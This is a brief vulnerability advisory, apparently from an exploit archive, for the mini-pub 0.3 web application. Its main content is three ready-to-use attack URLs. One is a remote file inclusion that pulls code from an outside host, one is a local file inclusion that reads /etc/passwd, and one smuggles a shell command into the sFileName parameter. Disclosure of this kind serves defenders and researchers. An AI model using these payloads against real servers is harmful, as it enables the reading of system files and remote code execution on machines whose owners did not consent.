mini-pub version 0.3 suffers from local file inclusion, remote file inclusion, and code execution vulnerabilities.
bfc0221d7e69c31bcd51241f081b8e3d43f9863d13e89d9812582c7ca3728f52
mini-pub 0.3 multiple vulnerabilities
download http://sourceforge.net/projects/mini-pub/
author muuratsalo
contact muuratsalo[at]gmail.com
exploits
1. remote file inclusion
http://localhost/mini-pub.php/front-end/img.php?sFileName=http://site.com/cmd.txt?
2. local file inclusion
http://localhost/mini-pub.php/front-end/cat.php?sFileName=/etc/passwd
3. command execution
http://localhost/mini-pub.php/front-end/cat.php?sFileName=a%3Benv